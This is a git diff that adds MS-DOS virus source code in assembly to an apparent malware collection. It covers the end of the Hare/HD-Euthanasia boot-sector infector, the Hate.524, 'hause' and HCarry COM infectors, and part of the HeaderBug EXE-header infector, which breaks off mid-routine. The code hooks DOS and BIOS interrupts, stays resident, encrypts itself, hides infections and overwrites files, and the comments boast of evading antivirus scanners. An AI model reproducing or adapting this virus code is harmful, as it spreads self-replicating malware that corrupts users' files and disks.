LOC_250 + + JMP LOC_251 +LOC_250: + CALL Traced_i13h ; Execute function. + + PUSHF + PUSH AX + PUSH BX + + MOV AH, 08h ; Get disk drive parameters. + MOV DL, 80h + CALL Traced_i13h + + INC CH + DEC DH + MOV DL, 80h + MOV AX, 0201h ; Read stored bootsector (?) + POP BX + CALL Traced_i13h + POP AX + POPF + + JMP LOC_253 +LOC_251: + PUSH DS + PUSH DI + PUSH SI + PUSH AX + DEC AL + PUSH ES + PUSH BX + + JZ LOC_252 + + ADD BX, 200h + INC CL + CALL Traced_i13h + DEC CL +LOC_252: + MOV AH, 08h + MOV DL, 80h + CALL Traced_i13h + POP BX + POP ES + INC CH + DEC DH + MOV DL, 80h + MOV AX, 0301h + CALL Encrypt_Boot + CALL Traced_i13h + MOV BX,AX + POP AX + MOV AL,BL + POP SI + POP DI + POP DS +LOC_253: + POP ES + POP DX + POP CX + POP BX + CALL Insert_Slice + RETF 2 +LOC_254: + JMP LOC_260 +LOC_255: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH SI + PUSH DI + + XOR AX, AX + MOV DS, AX + + XOR CH, CH + MOV CL, DL + INC AL + SHL AL, CL + + CMP CS:Function_i13h, 00h + JNE LOC_256 + + TEST AL, byte ptr Gaby1 + JNZ LOC_254 +LOC_256: + PUSH CS + POP DS + + PUSH DS + POP ES + + MOV CL, 4 ; Multiplied by 16. + SHL AL, CL + + MOV DATA_152, AL + MOV SI,3 +LOC_257: + XOR AX, AX ; Reset disk. + CALL Traced_i13h + + MOV AX, 0201h ; Read bootsector + MOV CX, 01h + MOV DH, CH + MOV BX, OFFSET Buffer + CALL Traced_i13h + JNC LOC_258 + + DEC SI + JZ LOC_254 + JMP LOC_257 +LOC_258: + MOV AX, Drew2 + SUB AX, Drew1 + + CMP AX, 0CCFFh + JE LOC_254 + + CALL SUB_71 + CALL SUB_72 + JNC LOC_259 + + MOV AX, 0401h ; Verify bootsector/MBR. + XOR CX, CX + INC CX + MOV DH, CH + CALL Traced_i13h + JMP LOC_260 +LOC_259: + XOR BX, BX + MOV CL, 01h + MOV AX, 0310h + CALL Traced_i13h + JC LOC_260 + + MOV BX, OFFSET Buffer + MOV CL, 11h + MOV AX, 0301h + CALL Traced_i13h + JC LOC_260 + + MOV BL, 02h + PUSH DX + CALL SUB_49 + POP DX + MOV CX, 01h + XOR DH, DH + MOV BX, OFFSET Buffer + MOV BYTE PTR DS:[Buffer], 0EBh ; JMP viruscode in MBR. + MOV BYTE PTR DS:[Buffer+1], 3Ch + MOV AX, 0301h + CALL Traced_i13h +LOC_260: + POP DI + POP SI + POP DS + POP ES + POP DX + POP CX + POP BX + POP AX + + CMP CS:Function_i13h, 0 + JE LOC_261 + + JMP LOC_243 + + + +LOC_261: + CMP DH, 00h + JNE LOC_262 + + CMP CX, 01h + JNE LOC_262 + + TEST CS:Flags, 00000100b + JNZ LOC_262 + + CMP AH, 02h + JE LOC_263 + + CMP AH, 03h + JE LOC_265 + +LOC_262: + JMP LOC_248 +LOC_263: + POPF + CALL Traced_i13h + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + JC LOC_264 + + MOV AX, ES:[BX+102h] ; Subtract 1st word from word. + SUB AX, ES:[BX+100h] + + CMP AX, 0CCFFh ; Infected bootsector? + JNE LOC_264 + + MOV CH, 51h ; Cylinder 81. + MOV CL, 11h ; Sector 17. + MOV DH, 01h ; 1st head. + MOV AX, 0201h ; Read sector + CALL Traced_i13h +LOC_264: + POP ES + POP DX + POP CX + POP BX + POP AX + + CALL Insert_Slice + + POPF + RETF 2 + + +LOC_265: + PUSH AX + PUSH BX + PUSH ES + + PUSH CS + POP ES + + MOV AX, 0201h + MOV BX, OFFSET Buffer + CALL Traced_i13h + + POP ES + POP BX + POP AX + + PUSH AX + + DEC AL + JZ LOC_266 + + ADD BX, 200h + INC CL + CALL Traced_i13h + + SUB BX, 200h + DEC CL +LOC_266: + PUSH DI + PUSH SI + PUSH DS + PUSH ES + PUSH BX + + MOV AX, ES:[DI+102h] ; Subtract word from word. + SUB AX, ES:[DI+100h] + + CMP AX, 0CCFFh ; Infected signature? + JNE LOC_267 + + MOV CH, 51h + MOV CL, 11h + MOV DH, 01h + MOV AX, 0301h + CALL Traced_i13h + + PUSH ES + POP DS + + PUSH CS + POP ES + + MOV SI, BX + ADD SI, 03h + MOV DI, 1E6Ch+1 + MOV CX, 59 + REP MOVSB + MOV BX, OFFSET Buffer +LOC_267: + MOV DH, 00h + MOV CX, 01h + MOV AX, 0301h + CALL Traced_i13h + + MOV CS:DATA_154,AH + + POP BX + POP ES + POP DS + POP SI + POP DI + POP AX + MOV AH, CS:DATA_154 + CALL Insert_Slice + POPF + + RETF 2 + + +SUB_71: + MOV AL, DS:1E7Eh+1 + + CMP AL,0FDH + JE LOC_268 + + MOV CH, 51h + JMP LOC_RET_269 +LOC_268: + MOV CH,29h + +LOC_RET_269: + RETN + + +SUB_72: + MOV DH, CH + MOV DATA_154, DL + + XOR AX, AX + MOV ES, AX + + LES DI, DWORD PTR ES:[1Eh * 4] + MOV AX, ES:[DI+3] + PUSH AX + MOV BYTE PTR ES:[DI+3], 02h + MOV BYTE PTR ES:[DI+4], 11h + + PUSH CS + POP ES + + MOV DI, OFFSET Drew4 + + CLD + MOV CX, 11h + MOV DL, 01h + +LOCLOOP_270: + MOV AH, 01h + MOV AL, DH + STOSW + + MOV AL, DL + MOV AH, 02h + STOSW + + INC DL + LOOP LOCLOOP_270 + + MOV AX, 50FH + MOV CH, DH + MOV CL, 1 + MOV DH, 1 + MOV DL, DATA_154 + MOV BX, 206AH + CALL Traced_i13h + PUSHF + MOV BYTE PTR Verify_Sectors+2, CH + + XOR AX, AX + MOV ES, AX + + LES DI, ES:[1Eh * 4] + POPF + POP AX + MOV ES:[DI+3],AX + PUSH CS + POP ES + RETN + +LOC_271: + MOV BX, 0B50h + + MOV ES, BX + XOR BX, BX + + MOV AX, 1E0Eh + + PUSH ES + PUSH AX + +Verify_Sectors: MOV CX, 5101h + + MOV AX, 0411h + MOV DX, 0100h + INT 13h ; Disk dl=drive a ah=func 04h + ; verify sectors with mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + MOV AX, 0211h ; Read virusbody from disk. + INT 13h + + JC LOC_271 + RETF + + STI + + XOR AX, AX + MOV ES, AX + + PUSH CS + POP DS + + CLD + MOV DI, 7C00h + MOV SI, 2000h + MOV CX, 512 + PUSH ES + PUSH DI + REP MOVSB + + MOV Flags, AL ; Clear flags. + + CALL Check_Poly_Sector + CALL Infect_Harddisk + + RETF + +Message DB '"HDEuthanasia-v3" by Demon Emperor:' + DB ' Hare Krsna, hare, hare...' + + ; (I sure hope 4U that ya never see this message during boot-up!). + +Virus_End: + +Buffer: + + +Marker DW 0 +File_Mod512 DW 0 +Byte_Pages DW 0 + DW 0 +Header_Size DW 0 + DW 0 + DW 0 +Init_SS DW 0 +Init_SP DW 0 + DW 0 +Init_IP DW 0 +Init_CS DW 0 +Reloc_Offs DW 0 + DW 0 +Undoc DW 0 +Ruck DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 +Drew1 DW 0 +Drew2 DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 +Drew3 DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 +Drew4 DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 + DW 0 +Poly_Sector DW 0 + + +Carrier: + PUSH CS + POP DS + + MOV AH, 09h ; Display warning-message. + MOV DX, OFFSET Warning + INT 21h + + MOV AX, 4C00h ; Exit to DOS. + INT 21h + + +Warning DB 'WARNING: This program is infected with the ' + DB 'HD-Euthanasia v3 (Hare.7786) virus!', 0Ah, 0Dh, '$' + + END START diff --git a/MSDOS/Virus.MSDOS.Unknown.hate.asm b/MSDOS/Virus.MSDOS.Unknown.hate.asm new file mode 100644 index 00000000..3c58cd8b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hate.asm @@ -0,0 +1,299 @@ +; Hate.524 (named by Moi because of Internal Text and Size) +; Uninteresting Encrypted COM Infector +; Source code compliments of PakiLad +p386n + + +seg000 segment byte public 'CODE' use16 + assume cs:seg000 + org 100h + assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing + +start proc near + and al, 21h + mov ax, 5800h + int 21h ; Virus Installation Check + cmp ah, 58h ; Installed Already? + jnz InstallVirus ; No? Then JMP. + mov ah, 4Ch + int 21h ; Exit To DOS + +InstallVirus: + call $+3 +start endp + +Next proc near + pop si + sub si, offset Next + mov dl, Cryptor[si] + cmp dl, 0 + jz Crypted + mov cx, VirusSize + lea di, Crypted[si] + +DecryptLoop: + mov al, [di] + xor al, dl + mov [di], al + inc di + loop DecryptLoop + +Crypted: + mov ah, 14h + int 21h ; Install Check + cmp ah, 6 ; Installed? + jz RestoreCOM ; Yes? Then JMP. + jmp short DoInstall + +RestoreCOM: + push cs + pop ds + mov ax, OrgByte1[si] + mov word ptr start, ax + mov ax, OrgByte2[si] + mov word ptr ds:102h, ax + mov al, OrgByte3[si] + mov byte ptr ds:104h, al + mov ax, offset start + push ax + retn ; Return to Original Program + +DoInstall: + mov ah, 52h + int 21h ; Get List Of Lists + mov bx, es:[bx-2] + +FindLastMCB: + mov es, bx + add bx, es:3 + inc bx + cmp byte ptr es:0, 'Z' ; Last MCB? + jnz FindLastMCB ; No? Then JMP. + mov ax, es + mov es, bx + cmp byte ptr es:0, 'M' ; More MCB To Follow? + jz GotMoreMCB ; Yes? Then JMP. + mov es, ax ; ES points to MCB + jmp short GotMemory + +GotMoreMCB: + mov es, bx + add bx, es:3 + inc bx + cmp byte ptr es:0, 'M' + jz GotMoreMCB + +GotMemory: + mov bx, es:3 + mov ax, 795 + mov cl, 4 + shr ax, cl + sub bx, ax + mov es:3, bx + mov ax, es + add bx, ax + xor di, di + mov es, bx + mov cx, TotalSize+100h + push si + rep movsb ; Copy Virus Into Memory + pop si + push es + pop ds + mov ax, 3521h + int 21h ; Get Int 21h Vectors + mov Int21Ofs, bx + mov Int21Seg, es + mov ah, 25h + mov dx, offset NewInt21 + int 21h ; Set New Int 21h Vectors + jmp RestoreCOM +Next endp + + +NewInt21: ; Install Check? + cmp ah, 14h + jnz CheckExecute ; No? Then JMP. + mov ah, 6 ; I'm Here! + iret + +CheckExecute: ; Set Execution State? + cmp ah, 4Bh + jnz CheckFCBFind ; No? Then JMP. + jmp short InfectFile + +CheckFCBFind: ; Find First File (FCB)? + cmp ah, 11h + jz FindFileFCB ; Yes? Then JMP. + cmp ah, 12h ; Find Next File (FCB)? + jnz DoOriginalFunc ; No? Then JMP. + +FindFileFCB: + call CallInt21 + pushf + pusha + push es + cmp al, 0 ; None found? + jnz NoFilesFound ; No? Then JMP. + mov ah, 2Fh + call CallInt21 ; Get DTA Segment/Offset + cmp byte ptr es:[bx], 0FFh ; Extended FCB? + jnz NotExtFCB ; No? Then JMP. + add bx, 7 + +NotExtFCB: + mov al, es:[bx+17h] + and al, 1Fh + cmp al, 1Fh ; Infected Already? + jnz NoFilesFound ; No? Then JMP. + sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize + +NoFilesFound: + pop es + popa + popf + iret + +DoOriginalFunc: + jmp short $+2 +JMPFar21 db 0EAh +Int21Ofs dw 0 +Int21Seg dw 0 + +InfectFile: + pusha + push es + push ds + mov ax, 3D02h + call CallInt21 ; Open File + jnb FileOpened ; No problems? Then JMP. + jmp CloseFile + +FileOpened: + xchg ax, bx + push cs + pop ds ; DS = CS + mov ah, 3Fh + mov cx, 5 + mov dx, offset OrgByte1 + call CallInt21 ; Read In 5 Bytes + mov ax, OrgByte1 + add ah, al + cmp ah, 0A7h ; Infected Already? + jnz NotBad1 ; No? Then JMP. + jmp CloseFile + +NotBad1: ; Infected Already? + cmp ah, 45h + jnz NoSigFound ; No? Then JMP. + jmp CloseFile + +NoSigFound: + mov ax, 5700h + call CallInt21 ; Get File Date/Time + push cx + push dx + and cx, 1Fh + cmp cx, 1Fh ; Infected Already? + jnz MovePtrEnd ; No? Then JMP. + pop dx + pop cx + jmp short CloseFile + +MovePtrEnd: + mov ax, 4202h + xor cx, cx + cwd + call CallInt21 ; Move Pointer to End of File + sub ax, 3 ; Calculate JMP Offset + mov JMPOffset, ax + mov ah, 40h + mov cx, CryptSize + mov dx, offset start + call CallInt21 ; Write Crypt Routine to File + mov cx, VirusSize + mov si, offset Crypted + mov di, offset EndOfVirus + mov ax, 8F20h + push es + push ax + pop es + assume es:nothing + in al, 40h ; Get Random Number + xchg al, dl + mov Cryptor, dl + +EncryptVirus: + mov al, [si] + xor al, dl + mov es:[di], al + inc si + inc di + loop EncryptVirus + mov cx, 1 + +EncryptSecond: + mov al, [si] + mov es:[di], al + inc si + inc di + loop EncryptSecond + pop es + assume es:nothing + push ds + mov ax, 8F20h + push ax + pop ds + assume ds:nothing + mov ah, 40h + mov cx, VirusSize2 + mov dx, offset EndOfVirus + call CallInt21 ; Write Encrypted Virus To File + pop ds + assume ds:seg000 + mov ax, 4200h + xor cx, cx + cwd + call CallInt21 ; Move Pointer to Beginning + mov ah, 40h + mov cl, 5 + mov dx, offset InfMarker + call CallInt21 ; Write JMP And Infection Marker + pop dx + pop cx + or cx, 1Fh + mov ax, 5701h + call CallInt21 ; Fix File Date/Time + +CloseFile: + mov ah, 3Eh + call CallInt21 ; Close File + pop ds + pop es + popa + jmp near ptr JMPFar21 + +CallInt21 proc near + pushf + call dword ptr cs:Int21Ofs + retn +CallInt21 endp + +OrgByte1 dw 2124h +OrgByte2 dw 20CDh +OrgByte3 db 0 +InfMarker dw 2124h +JMPInstruction db 0E9h +JMPOffset dw 0 +VirusName db 'THIS IS [HATE V1.0] VIRUS$' + +Cryptor db 0 +EndOfVirus: +CryptSize equ Crypted - start +VirusSize equ Cryptor - Crypted +VirusSize2 equ $ - Crypted +TotalSize equ $ - start +seg000 ends + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hause.asm b/MSDOS/Virus.MSDOS.Unknown.hause.asm new file mode 100644 index 00000000..f44483d3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hause.asm @@ -0,0 +1,325 @@ +_attr_ equ 0 +_date_ equ 2 +_time_ equ 4 + +fil equ 6 + + mov ax,4245h ;sepuku! + int 21h + jmp short jump1 + db 'DY' +dy equ $-2-100h + +_size dw offset total-100h +_ofs dw offset total + +db 'McAfee, geht nach Hause! Wir sind unberwindlich!' + +jump1: + mov ax,3521h + int 21h + mov old21[0],bx + mov old21[2],es + + mov ax,cs + dec ax + mov ds,ax + lodsb + cmp byte [0],'Z' + jne bee_bloop_blap + cmp word ptr [0003h],pgf + jc bee_bloop_blap + sub word ptr [0003h],pgf + sub word ptr [0012h],pgf + mov es,[0012h] + mov si,110h + mov di,si + sub di,10h + mov cx,total-100h + rep movsb + push es + pop ds + + cli + mov ax,2521h + mov dx,offset swansich + int 21h + sti + + jmp 100h + +bee_bloop_blap: + int 24h + int 20h + +st21 db 0 + +vier: + mov al,0 + iret + +swansich: + pushf + cmp ax,4245h + jne not_sepuku + cmp word [dy+100h],'YD' + jne not_sepuku + popf + push bp + mov bp,sp + mov ds,[bp+4] + pop bp + mov si,word _ofs + mov cx,word _size + mov di,100h + push ds + pop es + cld +bam: rep movsb + pop ax + mov ax,100h + push ax + call zero_regs + iret + +olr dw 0,0 + +not_sepuku: + cmp ah,40h + jne exec + cmp bx,5 + jb exec + + cmp cx,16 + jl exec + + call push_all + mov di,dx + add di,cx + dec di + mov al,[di] + mov bl,[di-1] + mov [di-1],al + mov [di],bl + call pop_all +exec: + cmp ax,4B00h ;exec + jne back + + cmp cs:st21,0 + jne back + + mov cs:st21,1 + + call push_all + xchg si,dx + mov di,fil + push cs + pop es + mov cx,128 + cld + rep movsb + call pop_all + + popf + + call o21 + + pushf + call push_all + + mov ax,3524h + call o21 + push bx + push es + + mov ah,25h + push ds + push cs + pop ds + push dx + mov dx,offset vier + call o21 + pop dx + pop ds + + push cs + pop ds + mov dx,fil + + mov ax,4300h + call o21 + mov cs:[_attr_],cx + mov ax,4301h + xor cx,cx + call o21 + jc err1 + + call infect + + mov ax,4301h + mov cx,cs:[_attr_] + call o21 + +err1: pop ds + pop dx + mov ax,2524h + call o21 + + mov cs:st21,0 + + call pop_all + popf + retf 2 + + +back: mov cs:st21,0 + popf +jfa: db 0EAh +old21 dw 0,0 + +o21: pushf + call dword ptr cs:[old21] + ret + +zero_regs: + xor ax,ax + xor bx,bx + xor cx,cx + xor dx,dx + xor si,si + xor di,di + ret + +jmp_to dw 0 + +push_all: + pop cs:[jmp_to] + push bp + push ds + push es + push di + push si + push dx + push cx + push bx + push ax + jmp cs:[jmp_to] + +pop_all: + pop cs:[jmp_to] + pop ax + pop bx + pop cx + pop dx + pop si + pop di + pop es + pop ds + pop bp + jmp cs:[jmp_to] + + + +;||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| +; infection routine +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +infect: + pushf + call push_all + + mov ax,3D02h + call o21 + jnc open + +i_back: + call pop_all + popf + ret + +open: + xchg bx,ax + + push cs + pop ds + push cs + pop es + + mov ax,5700h + call o21 + mov [_date_],dx + mov [_time_],cx + + mov ah,3Fh + mov cx,offset total-100h + mov dx,offset total + call o21 + jnc read1 +jcls1: jmp close + +read1: cmp ax,cx + jne jcls1 + + cmp word ptr [offset total],'ZM' + je jcls1 + cmp byte ptr [offset total],'Z' + je jcls1 + + cmp word ptr [offset total+dy],'YD' + je jcls1 + + mov ax,4202h + xor cx,cx + xor dx,dx + call o21 + jc jcls1 + + cmp dx,0 + jne jcls1 + cmp ah,0F1h + ja jcls1 + + add ax,100h + mov _ofs,ax + + mov ah,40h + mov dx,offset total + mov cx,offset total-100h + call o21 + + jc jcls1 + cmp ax,cx + jne jcls1 + + mov ax,4200h + xor cx,cx + xor dx,dx + call o21 + + mov ah,40h + mov cx,offset total-100h + mov dx,100h + call o21 + + and byte [_time_],255-31 + or byte [_time_],29 +close: + mov ax,5701h + mov cx,[_time_] + mov dx,[_date_] + call o21 + + mov ah,3Eh + call o21 +jcls2: jmp i_back + +db 'Demoralized Youth vous a eu' + +total: +pgf equ $/16*2 +db ' ' + + + + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.hcarry.asm b/MSDOS/Virus.MSDOS.Unknown.hcarry.asm new file mode 100644 index 00000000..58d30f5b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hcarry.asm @@ -0,0 +1,137 @@ +;This is the HCarry Virus +;dedicated to the late Harry Carry +;The only AV scanner that I know of that detects this virus is TBAV Scanner +start: ;start of virus! + +lea si, crypt_start +mov di,si +mov cx,end - crypt_start +call crypt + +jmp crypt_start + +xor_value db 0 + +crypt: +lodsb +xor al,byte ptr [xor_value] +stosb +loop crypt +ret + +crypt_start: +mov ah,9 ;print string to screen +lea dx,textmask +int 21h ;go do it dos! + +mov ax,0fa02 +push ax +mov bl,0 +mov dx,05945 +push dx +int 016 +push cx + +mov ah,4eh ;find first file +lea dx,filemask ;put the kind of file we want to find first in dx +xor cx,cx ;clears the cx register to 0 + +find_next: ;label for the find next rountine +int 21h ; go do it! +jnc infect ;jump if a file is found, if not continue jnc=jump +jmp text ;if carry flag isn't set + + + +infect: ;here is our infect rountine, where we go when we find a file to kill +mov ax,3d02h ; open file for read/write access (00=read + ;01=write 02=read/write) +mov dx, 9eh ;get file info +int 21h ;now!~ +mov bx,ax ;move info form bx register in ax + +in al,40h +mov byte ptr [xor_value],al + +mov ah,40h +lea dx,start +mov cx,crypt_start - start +int 21h + +lea si,crypt_start +lea di,end +mov cx,end - crypt_start +call crypt + +mov ah,40h ;40hex write to file +mov cx,end - crypt_start ; heres the length of what we want to write +lea dx,end ;and heres where to start +int 21h ; go! +mov ah,3eh ;close the file up +int 21h ;now! +mov ah,4fh ;find next file! +jmp find_next ;continue! + +text: +mov ah,4eh +lea dx,textfile +int 21h +jnc text_pload +jmp close + +text_pload: +mov ax,3d02h +mov dx,9eh +int 21h +mov ah,40h +mov cx,pload_end - pload_start +lea dx,pload_start +int 21h +jmp text_findnext + +text_findnext: +mov ah,4fh +int 21h +jnc text_pload +jmp close + +pload_start: +db 'HOLY COW!',10,13, +db '---',10,13, +db 'Whats your favorite planet?...Mines the SUN!',10,13, +db 'One time i studied it for a whole hour i almost went BLIND!',10,13, +db '---',10,13, +db 'Hey!....Whats goin.....Hey!',10,13, +db '---',10,13, +db 'Now just for some silly crap!',10,13, +db 'FLOCK!',10,13, +db 'Hehehehe Look At YOU!',10,13, +db 'Back to the Computer Store for you!',10,13, +db 'This is HORRRIBLE!' +db 'Who would do something like this?',10,13, +db 'MY LEG DOESNT BEND THAT WAY!',10,13, +db 'MOCB',10,13, +db 'This Virus has infected this file if you havnt found that out yet!',10,13, +db 'Please insert 25 cents!',10,13, +db 'DO DO DO Were Sorry your call did not go threw please hang up and try again',10,13, +db 'JERRY JERRY JERRY JERRY JERRY JERRY',10,13, +db 'Jerry Springer to HOT for Television',10,13, +db 'DOH!',10,13, +pload_end: + +close: +int 20h ;exit program + ;this next portion is the datasegment which the virus refers to for + ;the variable we give it + ;Thank you to Spo0ky,<-OPIC->,and Arsonic for helping me! + textfile db '*.txt',0 ;find .txt files + filemask db '*.com',0 ;the kinds of files we want + textmask db 'This file is now infected!',10,13, + db 'By The HCarry virus!',10,13, + db 'MoCBDUKE[Codebreaker, 1998]',10,13,'$' +end: + + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.headbug.a86 b/MSDOS/Virus.MSDOS.Unknown.headbug.a86 new file mode 100644 index 00000000..33df6e40 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.headbug.a86 @@ -0,0 +1,288 @@ +;============================================================================= +; Virus Name: HeaderBug +; Effective Length: 324 Bytes (no increase in file length) +; +; Notes: +; - resident, BIOS-level-stealth .EXE header infector +; - undetectable by any current A-V scanner even w/o stealth +; - infects SMARTDRV.EXE to ensure residency at each boot +; - infects .EXE header sectors whenever accessed for write +; OR read (during reads only if A-V monitor is not +; resident) +; - As a result, will infect every target .EXE file during +; even such operations as a fixed disk DEFRAG +; - successfully infects Windows .EXE files without +; detection even when 32-bit file access is in use +; - does not decrease available memory +; - no harmful payload +; +; To Compile: +; - use shareware A86 assembler +; - type "a86 headbug.a86" +; - resulting headbug.com is actually an .exe file. +; It is a virus dropper which, if executed, will infect +; your system with HeaderBug +;============================================================================= + +start_offset equ 07d*4-1 +res_offset equ start_offset-01a0 +com_offset equ 0100 +header_offset equ 01a0 +infect_tag equ 0c033 +setver_tag equ 0d4a +viruslength equ 0144 +old_code_length equ 012 + +EH_Signature dw 'ZM' ;set to 'MZ' or 'ZM' for .exe files +EH_Modulo dw 0000 ;remainder of file size/512 +EH_Size dw 0012 ;file size/512 +EH_Reloc dw 0000 ;6 ;number of relocation items +EH_Size_Header dw 000a ;8 ;size of header in paragraphs +EH_Min_Mem dw 0240 ;minimum paragraphs needed by file +EH_Max_Mem dw 0240 ;maximum paragraphs needed by file +EH_SS dw 0240 ;stack segment displacement +EH_SP dw ? ;stack pointer +EH_Checksum dw ? ;checksum, not used +EH_IP dw 0000 ;14 ;instruction Pointer of Exe file +EH_CS dw 0000 ;16 ;code segment displacement of .exe +EH_1st_reloc dw ? ;first relocation item +EH_ovl dw ? ;overlay number + + db 084 dup ? ;pad rest of header w/dummy bytes + +;----------------------------------------------------------------------------- +; Header_entry - Tests interrupt vector table for room and if there is room, +; installs virus in unused area of interrupt table. Read and write disk +; cache on all drives are disabled (prevents infection problems), SMARTDRV +; infected in default directory to ensure that virus becomes resident on each +; boot and that SMARTDRV's disk cache is never installed. SMARTDRV is +; infected through read-file action (not write) by installed int13 routine. +;----------------------------------------------------------------------------- + +header_entry: + xor ax,ax ;set ax=0 + mov ds,ax ;set ds=ax + mov es,ax ;set es=ax + + dec ax ;set ax=ffffh as flag for zero_test + mov si,start_offset ;set si to start address in INT table + push si ;save value for later use + call zero_test ;check for clear area in INT table + pop di ;set destination offset to INT table + jc exit_header ;if area not clear, exit, don't install + + xor si,si ;set source offset to virus start + call move_it ;move virus to empty space in INT table + + mov di,offset old13+res_offset ;set destination for int13 + mov si,013*04 ;set source for int13 vector + push si ;save value for later use + movsw ;copy int13 vector + movsw + pop di ;set destination for new value + mov ax,offset int13+res_offset ;virus int13 routine offset + stosw ;store new offset in int13 + xor ax,ax ;virus int13 routine segment + stosw ;steal int13 + + mov bx,03 ;value required for STATUS call + mov bp,05 ;set max. number of drives +kill_cache: + mov ax,04a10 ;SMARTDRV STATUS function + push ax ;save it for later use + mov dl,02 ;turn off drive's read buffer + int 02f ;do it + + pop ax ;restore ax + mov dl,04 ;turn off drive's write buffer + int 02f ;do it + + dec bp ;decrement drive number + jns kill_cache ;if drive number >=0, repeat process + + push cs + pop ds ;set ds=cs + + mov ax,03d00 ;open file w/handle + mov dx,offset filename-header_offset ;point to filename + int 021 ;do it + jc exit_header ;if flag=fail, exit + + mov bx,ax ;save handle + + mov ah,03f ;read file w/handle + mov ch,02 ;read 200h bytes (header sector) + mov dh,02 ;point to buffer area beyond virus + int 021 ;do it (infect SMARTDRV.EXE header) + + mov ah,03e ;close file w/handle + int 021 ;do it + +exit_header: + mov ah,04c ;terminate with return code + int 021 ;do it + +filename: db 'C:\DOS\SMARTDRV.EXE',0 ;file to initially infect + +;----------------------------------------------------------------------------- +; Int13 - On any read or write, checks sector for .EXE header characteristic. +; Checks for word found in header of SETVER.EXE to prevent infection and +; resulting problems (lockup) when an infected SETVER is loaded from default +; CONFIG.SYS. If sector is being read, checks for infection then checks for +; presence of A-V monitor before infecting. If sector is being written, only +; checks for SETVER header, since stealth on prior int13 would hide previous +; infection and since any A-V monitor would expect a write action. In both +; read or write cases, sector is restored to appear identical to pre-infection +; before buffer containing .EXE header is presented to calling program. Name +; of virus stored in area of interrupt table used by TBDriver vectors in +; order to prevent system crash if TBDriver is loaded after virus is resident. +;----------------------------------------------------------------------------- + +int13: + push cx ;preserve registers + push si + push di + push ds + + push es + pop ds ;set ds=es + + cmp ah,03 ;write operation? + je write ;if so, jump to write routine + cmp ah,02 ;read operation? + jne chain_old_int13 ;if not, exit + +read: + pushf + call far cs:[offset old13+res_offset] ;call int13 (read sector) + jc exit_int13 ;if flag=fail, exit + + mov si,'ZM' ;bytes indicating .EXE header + cmp [bx],si ;.EXE header? + jne exit_fail ;if not, exit + + cmp [bx+014],setver_tag ;is this SETVER's header? + je exit_fail ;if so, exit + + cmp [bx+0a0],infect_tag ;already infected? + 